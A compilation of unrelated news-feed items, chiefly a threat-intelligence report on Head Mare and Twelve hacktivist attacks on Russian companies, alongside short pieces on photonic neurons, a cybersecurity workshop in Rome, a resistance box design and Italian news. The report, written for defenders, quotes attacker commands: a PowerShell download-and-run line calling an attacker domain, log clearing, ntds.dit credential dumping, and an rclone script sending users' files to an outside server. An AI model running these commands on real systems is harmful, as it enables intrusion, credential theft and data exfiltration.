So-called neuromorphic computing involves the use of physical artificial neurons to do computing in a way that is inspired by the human brain. With photonic neuromorphic computing these artificial neurons generally use laser sources and structures such as micro-ring resonators and resonant tunneling diodes to inject photons and modulate them akin to biological neurons.
General reservoir computing with laser graded neuron. (Credit: Yikun Nie et al., 2024, Optica)
One limitation of photonic artificial neurons was that these have a binary response and a refractory period, making them unlike the more versatile graded neurons. This has now been addressed by [Yikun Nie] et al. with their research published in Optica.

The main advantage of graded neurons is that they are capable of analog graded responses, combined with no refractory period in which the neuron is unresponsive. For the photonic version, a quantum dot (QD) based gain section was constructed, with the input pulses determining the (analog) output.

Multiple of these neurons were then combined on a single die, for use in a reservoir computing configuration. This was used with a range of tests, including arrhythmia detection (98% accuracy) and handwriting classification (92% accuracy). By having the lasers integrated and the input pulses being electrical in nature, this should make it quite low-power, as well as fast, featuring 100 GHz QD lasers.

hackaday.com/2025/03/13/high-s…

Introduction

In September 2024, a series of attacks targeted Russian companies, revealing indicators of compromise and tactics associated with two hacktivist groups: Head Mare and Twelve. Our investigation showed that Head Mare relied heavily on tools previously associated with Twelve. Additionally, Head Mare attacks utilized command-and-control (C2) servers exclusively linked to Twelve prior to these incidents. This suggests potential collaboration and joint campaigns between the two groups.

The attackers continue to refine their methods, employing both familiar tools from past Head Mare incidents and new PowerShell-based tools.

This report analyzes the software and techniques observed in recent Head Mare attacks and how these overlap with Twelve’s activities. The focus is on Head Mare’s TTPs and their evolution, with notes on commonalities with Twelve’s TTPs.

Technical details

Head Mare’s toolkit

The attackers used various publicly available tools, including open-source software and leaked proprietary tools, to achieve their goals.

• mimikatz;
• ADRecon;
• secretsdump;
• ProcDump;
• Localtonet;
• revsocks;
• ngrok;
• cloudflared;
• Gost;
• fscan;
• SoftPerfect Network Scanner;
• mRemoteNG;
• PSExec;
• smbexec;
• wmiexec;
• LockBit 3.0;
• Babuk.

Some of these tools were mentioned in our previous report on Head Mare, while others were new to their arsenal.

Notable new tools

Among the tools used by Head Mare were some not previously employed by the hacktivists but seen in attacks by other groups. For instance, they used the CobInt backdoor for remote access to domain controllers, previously observed only in Twelve’s attacks on Russian companies. This is an interesting fact, suggesting that Twelve and Head Mare may be sharing tools.

In addition to CobInt, the attackers used their own PhantomJitter backdoor, installed on servers for remote command execution. This tool appeared in the group’s arsenal in August 2024. We described its modus operandi in a story accessible to the subscribers of our Threat Intelligence reports.

Another new tactic involved a tool for remote command execution on a business automation platform server. Thus, the attackers used both proven and new tools, demonstrating flexibility and adaptability.

Initial Access

While previous Head Mare attacks relied solely on phishing emails with malicious attachments, they now also infiltrate victims’ infrastructure through compromised contractors with access to business automation platforms and RDP connections. This confirms the trend of hacktivists exploiting trusted relationships (T1199 – Trusted Relationship and T1078 – Valid Accounts).

The attackers also exploited software vulnerabilities, most commonly CVE-2023-38831 in WinRAR through phishing emails. In one incident, they exploited the Microsoft Exchange server vulnerability CVE-2021-26855 (ProxyLogon). Although patched in 2021, this vulnerability is still exploitable due to organizations using outdated operating systems and software. Our telemetry data revealed domain controllers still running Microsoft Windows Server 2012 R2 Server Standard x64 or, as in the aforementioned incidents, Microsoft Exchange Server 2016 used for email.

The attackers used ProxyLogon to execute a command to download and launch CobInt on the server.

Persistence

The method of establishing persistence has changed. Instead of creating scheduled tasks, the attackers now create new privileged local users on a business automation platform server. They use these accounts to connect to the server via RDP to transfer and execute tools interactively.

They also install traffic tunneling tools like Localtonet for persistent access to the target host. They made Localtonet persistent with the help of Non-Sucking Service Manager (NSSM), which allows running any application as a Windows service, as well as monitoring and restarting it if it fails for some reason. This user-friendly tool is often used legitimately to install and manage programs that cannot function as services. Localtonet and NSSM help the malicious actor to maintain continuous access to the infected host.

Anti-detection techniques

Head Mare continued to use the Masquerading technique (T1655), naming utility executables like standard operating system files. The investigation found files such as:

In one incident, cmd.exe was renamed to log.exe and launched from C:\Users\[username]\log.exe.

Besides renaming files, the attackers also removed services and files they had created and cleared event logs to evade detection. Relevant artifacts were found in the PowerShell command history on attacked machines:
stop-service -name <servicename>
remove-service -name <servicename>
remove-service -name "<servicename>"
sc stop <servicename>
sc delete <servicename>
Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
The ransomware executable also cleared system logs, as evidenced by a flag in the configuration of the samples that we have analyzed.

Command and Control

After exploiting the business automation platform server, attackers downloaded and installed the PhantomJitter backdoor. In the incidents we observed, the backdoor was downloaded into the victims’ infrastructure from the following URLs:
http[:]//45.87.246[.]34:443/calc.exe
http[:]//185.158.248[.]107:443/calc.exe
The file was saved in the local directory as c.exe. Upon launch, it connected to the C2 server, allowing the operator to execute commands on the compromised host.

In addition to PhantomJitter, the attackers used CobInt, whose payload connected to the following C2 server:
360nvidia[.]com
The domain resolves to the IP address 45.156.27[.]115.

Pivoting

The group expanded its arsenal to achieve their objectives at this stage. To gain remote access to the compromised infrastructure, they used a custom PowerShell script named proxy.ps1 to install and configure cloudflared and Gost.

Gost is a lightweight, powerful proxy utility offering various network routing and traffic hiding capabilities. It supports multiple protocols and can create secure communication channels, bypass blocks, and establish tunnels.

Cloudflared tunnels traffic through the Cloudflare network. It establishes a secure connection to an attacker-controlled Cloudflare server, acting as a proxy for C2 communication. This bypasses network restrictions like NAT (Network Address Translation) and firewall rules that might hinder direct connections between the victim host and attacker servers.

The proxy.ps1 script can also download archives from URLs specified on a command line and extract them to a temporary folder. Below is the help output for the script:
Usage: .\proxy.ps1 -r https://<site>.com/archive.zip -p gost_port -t cloudflared_token

Parameters:
-l Extract archive locally.
-r Download and extract archive remotely.
-p Specify the port for the gost.
-t Specify the token for the cloudflared.
-u Uninstall gost & cloudflared.
-h Show this help message.
The script defines constants for filenames, installing cloudflared and Gost with names mimicking standard Windows services in the C:\Windows\System32 folder. The script uses the GetTempFileName function to obtain temporary file paths.
$archivePath = "win.zip"
$filesPath = "C:\Windows\System32"
$cloudflaredPath = Join-Path -Path $filesPath -ChildPath "winuac.exe"
$gostPath = Join-Path -Path $filesPath -ChildPath "winsw.exe"
$winswPath = Join-Path -Path $filesPath -ChildPath "winsws.exe"
$winswxmlPath = Join-Path -Path $filesPath -ChildPath "winsws.xml"
$tempFile = [System.IO.Path]::GetTempFileName()
If the -p flag is specified in the command line, a service for the Gost tool will be installed on the system. The following function is used for this:
function Setup-Gost-Service {
# Set port
[xml]$winswxml = Get-Content $winswxmlPath
$winswxml.service.arguments = $winswxml.service.arguments -replace '42716', $p
$winswxml.Save($winswxmlPath)
Write-Host "

# Service install
Write-Host "

If -t key is passed to the script, it installs and configures cloudflared in the system.
function Setup-Cloudflared-Service {

# Service install
Write-Host "

In addition to installing and configuring tunneling tools, the script has the ability to remove the artifacts they leave behind. The script can also stop and uninstall the cloudflared and Gost services, if the -u parameter is passed to it when it launches.
if ($u) {
Write-Host "

Write-Host "

$filePaths = @(
"C:\Windows\System32\winsws.wrapper.log",
"C:\Windows\System32\winsws.err.log",
"C:\Windows\System32\winsws.out.log",
"C:\Windows\System32\winsws.xml",
"C:\Windows\System32\winsws.exe",
"C:\Windows\System32\winsw.exe",
"C:\Windows\System32\winuac.exe"
)
foreach ($filePath in $filePaths) {
if (Test-Path $filePath) {
Remove-Item -Path $filePath -Force
Write-Output "

In one incident, the attackers downloaded cloudflared and Gost from the server 45[.]156[.]21[.]148, which we previously saw in Head Mare attacks. An example download link is:
hxxp://45[.]156[.]21[.]148:8443/winuac.exe
Besides cloudflared and Gost, the attackers used cloud tunnels like ngrok and Localtonet. Localtonet is a reverse proxy server providing internet access to local services. The attackers launched it as a service using NSSM, downloading both tools from the official Localtonet website (localtonet[.]com).
hxxp://localtonet[.]com/nssm-2.24.zip
hxxp://localtonet[.]com/download/localtonet-win-64.zip
After downloading, they extracted the tools and launched them with these parameters:
nssm.exe install Win32_Serv
localtonet.exe authtoken <token>
These commands allow installing Localtonet as a service and authorizing it with a token for configuration.

Reconnaissance

The attackers used common system reconnaissance tools like quser.exe, tasklist.exe, and netstat.exe on local hosts. They primarily used fscan and SoftPerfect Network Scanner for local network reconnaissance, along with ADRecon, a tool for gathering information from Active Directory. ADRecon is a PowerShell script not previously observed in the group’s arsenal.

The attackers also used ADRecon to study the Active Directory domain, including computers, accounts, groups, and trust relationships between domains. The command history showed various domains passed as arguments to the script:
.\ADRecon.ps1 -DomainController <FQDN A>
.\ADRecon.ps1 -DomainController <FQDN B>
.\ADRecon.ps1 -DomainController <FQDN C>
<..>

Privilege Escalation

The attackers exploited previously compromised accounts of victims and their contractors, and created privileged local accounts, particularly when exploiting the business automation software server. If a user has sufficient permissions to remotely execute commands on the server, this software allows running a child command prompt process, such as cmd.exe, with privileges in the operating system corresponding to the program’s privileges. Since business automation software typically has administrator privileges in the OS, the child process also becomes privileged. The attackers exploited this opportunity: after gaining access to the vulnerable software server, they created a privileged local account on whose behalf they launched a command interpreter.

Command Execution

The attackers launched the Windows command interpreter on the business automation platform server in the target system within a process that executed the following command line:
cmd /c powershell.exe -ep bypass -w hidden -c iex ((New-Object
Net.WebClient).DownloadString('http://web-telegram[.]uk/vivo.txt')) > $temp\v8_B5B0_11.txt
This command downloads and executes the vivo.txt file, which we were unable to obtain. However, based on system events, we suspect that it opened a reverse shell, which the operator used to create two files in the target system.
c:\programdata\microsoftdrive\mcdrive.vbs
c:\programdata\microsoftdrive\mcdrive.ps1
Then, using reg.exe, the attackers added an autorun entry to execute mcdrive.vbs with the interpreter wscript.exe.
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v "mcdrivesvc" /t
REG_EXPAND_SZ /d "wscript.exe \"$appdata\MicrosoftDrive\mcdrive.vbs
The VBS file is an obfuscated Visual Basic script that creates an ActiveX object reference named WScript.Shell and uses its Run() function to execute an obfuscated command line.

A deobfuscated command line snippet follows:
%SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -NoLogo -
NonInteractive -NoProfile -w hidden -c iex
([System.IO.File]::ReadAllText('C:\ProgramData\MicrosoftDrive\mcdrive.ps1'))
This command reads and executes the C:\ProgramData\MicrosoftDrive\mcdrive.ps1 file through the PowerShell interpreter. This file is a CobInt loader, previously seen only in Twelve’s arsenal. The mcdrive.ps1 snippet below determines the operating system’s bitness, decrypts, and executes the payload, which initiates a request to a C2 server at 360nvidia[.]com. The image below shows a graph obtained from analysis in the Cloud Sandbox on our Threat Intelligence Portal.

Payload execution analysis graph. The IP address shown on the graph corresponds to the domain 360nvidia.com

Credential Access

The investigation identified tools for obtaining credentials. Besides the publicly available mimikatz utility, the attackers used secretsdump and ProcDump. Secretsdump was found on one victim’s system at the following paths:
[USERNAME]\Desktop\secretsdump.exe
[USERNAME]\Desktop\secretsdump (1).exe
A new Go-based sample named update.exe was also discovered, enabling the dumping of the ntds.dit file and the SYSTEM/SECURITY registry hive using ntdsutil.exe.
powershell ntdsutil.exe "'ac i ntds'" 'ifm' "'create full temp'" q q
Additionally, manual PowerShell commands were observed for dumping data from these locations.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp1' q q
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
While no traces of the first command’s successful execution were found, the results of the second one were located at the following paths:
\temp\Active Directory
\temp\registry
\temp\Active Directory\ntds.dit
\temp\Active Directory\ntds.jfm
\temp\registry\SECURITY
\temp\registry\SYSTEM
\temp\[REDACTED].zip

Lateral Movement

The attackers used RDP to connect to systems, including with privileged accounts. They connected to NAS servers via SSH and used tools like mRemoteNG, smbexec, wmiexec, PAExec, and PsExec for remote host communication.

Data Collection and Exfiltration

Another new tool in Head Mare’s arsenal was a script running wusa.exe. Normally, this file name is used by the legitimate Windows update process. However, the script’s launch parameters indicated that the file was actually the rclone.exe utility. Rclone is an open-source project for copying and synchronizing files between storages of different types, making it convenient for data transfer.
@echo off
setlocal enabledelayedexpansion
set inputFile=C:\ProgramData\1.txt
for /f "tokens=*" %%A in (%inputFile%) do (
set hostname=%%A
start /wait "" C:\ProgramData\wusa.exe --config="C:\ProgramData\1.conf" --sftp-socks-proxy <username>:<password>@64.7.198.109:80 sync "\\%%A\C$\Users" sftpP:/data/<path> -q --ignore-existing --auto-confirm --include "*.doc" --include "*.docx" --include "*Desktop/**" --include "*Documents/**" --include "*Downloads/**" --include "*.pdf" --include "*.xls" --include "*.xlsx" --include "*.zip" --include "*.rar" --include "*.txt" --include "*.pn*" --include "*.ppt" --include "*.pptx" --include "*.jp*" --include "*.eml" --include "*.pst" --multi-thread-streams 12 --transfers 12 --max-age 3y --max-size 1G
)
endlocal
The script starts by taking the file 1.txt as input, which contains a list of hosts. For each host, it runs rclone.exe to transfer files from the device to an SFTP server through a SOCKS proxy. The attackers only exfiltrated files from specific directories or files matching the extension templates specified in the script.

Final goal: file encryption

As in previous attacks, they encrypted data using variants of LockBit 3.0 (for Windows systems) and Babuk (for NAS devices). The investigation found that the LockBit file was initially saved on the victim’s host at the following paths:

• C:\Users\{username}\Desktop\locker.exe;
• С:\Windows\SYSVOL\Intel\locker.exe.

Below is a sample ransom note, with the cybercriminals’ contacts redacted:

Contents of a LockBit ransom note

Connection between Head Mare and Twelve

In addition to the aforementioned TTPs, we attribute these attacks to Head Mare based on the following characteristics:

1. A previously seen IP address:
   
   • 45.156.21[.]148

   
   

2. Malware:
   
   • PhantomJitter

   
   

Further details about these indicators can be found in the private report on the Threat Intelligence Portal: “HeadMare’s new PhantomJitter backdoor dropped in attacks exploiting Microsoft Exchange”.

However, the presence of Twelve’s tools like CobInt suggests collaboration. To test this hypothesis, activity cluster diagrams were created based on the Diamond Model framework. Overlaps – common elements in the tactics of both groups – are highlighted in red, indicating potential coordination.

Analysis of the Head Mare techniques and tools

In the image above, we see for the first time the use of the CobInt malware in Head Mare attacks. Previously, it was present only in the arsenal of the Twelve group, the analysis of which is presented below.

Analysis of the Twelve techniques and tools

Also, the analysis of the two models revealed overlaps in the infrastructure (C2s) of the groups. The following infrastructure elements appearing in Head Mare attacks were also present in a number of incidents related to the activities of the Twelve group.

• 360nvidia[.]com;
• 45.156.27[.]115

In addition, we have identified other similarities in the arsenal of the two groups:

1. File names:
   
   • proxy.ps1
   • ad_without_dc.ps1

   
   

2. Paths:
   
   • C:\Windows\System32\winsw.exe
   • C:\Windows\System32\winsws.exe
   • C:\Windows\System32\winuac.exe

   
   

3. Service names:
   
   • winsw (Microsoft Windows Update)
   • winuac (Microsoft UAC Service Wrapper)

   
   

4. Victims:
   
   • Manufacture, government, energy

   
   

The final intersection points of the Head Mare and Twelve groups are shown in the image below. Given the overlaps in infrastructure, TTPs, CobInt malware, and victim choices, we assume that these groups act together, exchanging access to command-and-control servers and various tools for carrying out attacks.

Overlaps in TTPs, tools, and infrastructure between Head Mare and Twelve

Conclusion

Head Mare is actively expanding its set of techniques and tools. In recent attacks, they gained initial access to the target infrastructure by not only using phishing emails with exploits but also by compromising contractors.

They also use tools previously seen in attacks by other groups, such as Twelve’s CobInt backdoor.

This is not the only similarity between the two groups. In addition to the toolkit, the following were noticed:

• Shared command-and-control servers: 360nvidia[.]com, 45.156.27[.]115
• PowerShell scripts accessing these C2 servers: mcdrive.ps1
• Scripts for tunneling network connections: proxy.ps1

Based on the factors described above, we assume that Head Mare is working with Twelve to launch attacks on state- and privately controlled companies in Russia. We will continue to monitor the activity of the attackers and share up-to-date information about their TTPs. More details about the hacktivists’ activities and their tools, such as PhantomJitter, can be found in the materials available to subscribers of our Threat Intelligence reports.

Indicators of compromise

Please note: the network addresses given in this section were valid at the time of publication but may become outdated in the future.

Hashes:

File paths:
С:\Windows\SYSVOL\Intel\locker.exe
C:\ProgramData\MicrosoftDrive\mcdrive.ps1
C:\ProgramData\MicrosoftDrive\mcdrive.vbs
C:\ProgramData\proxy.ps1
C:\ProgramData\wusa.exe
C:\Users\{USERNAME}\AppData\Roaming\1.bat
C:\Users\{USERNAME}\AppData\Roaming\Microsoft\Windows\Recent\mimikatz.lnk
C:\Users\{USERNAME}\AppData\Roaming\proxy.ps1
C:\Users\{USERNAME}\Desktop\Обработка.epf
C:\Users\{USERNAME}\Desktop\ad_without_dc.ps1
C:\Users\{USERNAME}\Desktop\ADRecon.ps1
C:\Users\{USERNAME}\Desktop\h.txt
C:\Users\{USERNAME}\Desktop\locker.exe
C:\Users\{USERNAME}\Desktop\mimikatz.exe
C:\Users\{USERNAME}\Desktop\mimikatz.log
C:\Users\{USERNAME}\Desktop\secretsdump (1).exe
C:\Users\{USERNAME}\Desktop\secretsdump.exe
C:\Users\{USERNAME}\Downloads\mimikatz-master.zip
C:\users\{USERNAME}\log.exe
C:\windows\adfs\ar\update.exe
C:\windows\system32\inetsrv\c.exe
C:\windows\system32\inetsrv\calc.exe
C:\windows\system32\winsw.exe
C:\Windows\System32\winsws.exe
C:\windows\system32\winuac.exe
C:\Windows\SYSVOL\Intel\mimikatz.exe

IP addresses and domain names:
360nvidia[.]com
web-telegram[.]uk
45.156.27[.]115
45.156.21[.]148
185.229.9[.]27
45.87.246[.]34
185.158.248[.]107
64.7.198[.]109

securelist.com/head-mare-twelv…

Giovedì 8 maggio, la Red Hot Cyber Conference 2025 ospiterà un’intera giornata dedicata ai ragazzi con i Workshop Hands-on (organizzati in collaborazione con Accenture Italia). Si tratta di un’opportunità unica e gratuita per immergersi nel mondo della cybersecurity e della tecnologia in modo pratico e interattivo. Vista la folla dello scorso anno che ha assalito la conferenza durante i workshop, questo anno i workshop si svolgeranno all’interno del teatro che mette ben 800 posti a disposizione.

L’evento si terrà a Roma, presso il Teatro Italia, con accoglienza a partire dalle 11:00 dando modo alle scolaresche che arrivano da fuori Roma di accedere alla manifestazione nei tempi. Il Teatro Italia dista solo 20 minuti a piedi dalla Stazione Termini e 6 minuti a piedi dalla Metro B di Piazza Bologna (circa 600 metri).

L’inizio dei workshop è fissato alle 11:30. Questa giornata sarà dedicata a tutti i ragazzi delle scuole medie, superiori ed università o banalmente dei curiosi che si vorranno immergere nella tecnologia e nella sicurezza informatica in modo pratico, interattivo e coinvolgente.

Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio

Come lo faremo

Non solo parole, ma attraverso l’esperienza diretta! Attraverso sessioni tecniche immersive, i ragazzi avranno l’opportunità di sperimentare in prima persona come gli hacker etici testano le vulnerabilità di un sito web, come l’intelligenza artificiale può essere utilizzata per riconoscere oggetti o analizzare deepfake, e come affrontare problemi specifici di cybersecurity. Inoltre, esploreranno il Dark Web in modo sicuro, comprendendo l’importanza dell’Open Source Intelligence (OSINT) e della Cyber Threat Intelligence oltre a parlare di Doxing e Cyberbullismo.

Questa iniziativa avrà la caratteristica “hands on”. In informatica, l’espressione “hands-on” si riferisce a un approccio pratico e concreto all’apprendimento o all’esecuzione di specifici compiti. Significa letteralmente “mani sopra” e implica l’effettiva manipolazione, sperimentazione o applicazione di conoscenze o abilità in un contesto pratico anziché limitarsi a una comprensione teorica o astratta.

Ti invitiamo a portare il tuo portatile con il sistema operativo che preferisci, così potrai partecipare attivamente agli esercizi insieme ai nostri esperti. Se qualche passaggio ti sfuggirà, nessun problema: tutti i workshop saranno registrati e disponibili sul nostro canale YouTube, così potrai rivederli quando vuoi, proprio come negli anni precedenti.

[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]
Workshop “hands-on” del 2024 all’interno della Red Hot Cyber Conference 2024

Un’Esperienza Interattiva e Pratica

L’obiettivo non sarà quindi solo “passivo”, ma soprattutto “attivo”, per consentire ai ragazzi di toccare con mano qualcosa che da sempre hanno visto nei film pensando che fosse qualcosa di inarrivabile, attivando nelle loro avide voraci menti un interesse per queste specifiche materie che nessuno gli ha mai fatto provare da vicino.

A differenza delle edizioni precedenti, i workshop saranno concentrati esclusivamente nella giornata dell’8 maggio e offriranno ai partecipanti la possibilità di toccare con mano le tecnologie più innovative, grazie a diverse sessioni pratiche.

Porta il tuo laptop! In alcuni di questi workshop avrai la possibilità di mettere subito mano e provare nella pratica quanto appreso, sotto la guida di esperti del settore.

[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]

Programma della Giornata

Di seguito, il programma dettagliato dei workshop che verranno svolti nella giornata di giovedì 8 maggio (che potrete trovare anche nel programma completo della conference):

Perché Partecipare?

• Esperienza pratica: Non solo teoria, ma esercizi concreti per migliorare le tue competenze.
• Esperti del settore: Sessioni guidate da professionisti altamente qualificati.
• Approfondimenti unici: Temi cruciali come ethical hacking, privacy, intelligenza artificiale e cyberbullismo.
• Networking: Un’opportunità per connettersi con altri appassionati di cybersecurity.

Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Workshop “hands-on” del 2024 all’interno della Red Hot Cyber Conference 2024

Registrati Subito!

L’ingresso ai Workshop Hands-on richiede una registrazione separata rispetto alla conferenza. Prenota il tuo posto qui: rhc-conference-2025-workshop.e…

Non perdere questa occasione per apprendere, sperimentare e metterti alla prova nel mondo della cybersecurity! Ci vediamo giovedì 8 maggio a Roma!

L'articolo Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo proviene da il blog della sicurezza informatica.

One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.

It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.

We like this as a conference giveaway, being used to badges it’s refreshing to see a passive take on a PCB artwork. Meanwhile this isn’t the first resistance box we’ve seen with unconventional switches.

hackaday.com/2025/03/13/a-deca…

E non sono purtroppo mancati anche i decessi: la Romania ne ha registrati 18 attribuiti al morbillo, e l'Irlanda uno.

rainews.it/articoli/2025/03/mo…

agi.it/economia/news/2025-03-1…

Tra i prodotti inclusi nella lista (ancora in via di definizione): la soia, proveniente in particolare da Stati come la Louisiana, feudo dello speaker della Camera Mike Johnson. È già oggetto di ritorsioni da parte di altri Paesi. Carne bovina e pollame; settori chiave per Stati a maggioranza repubblicana come il Nebraska e il Kansas;

[...]

Le iconiche Harley-Davidson, già bersaglio di precedenti contromisure europee, e per cui Bruxelles incoraggio le alternative made in Europe. E ancora: prodotti in legno, fondamentali per l'economia di Stati come Georgia, Virginia e Alabama, e ritenuti input strategici per il settore manifatturiero Usa.

L'obiettivo, spiegano da Bruxelles, è chiaro: "Colpire settori cruciali per l'economia statunitense, molti dei quali situati in stati politicamente sensibili, senza danneggiare l'interesse europeo".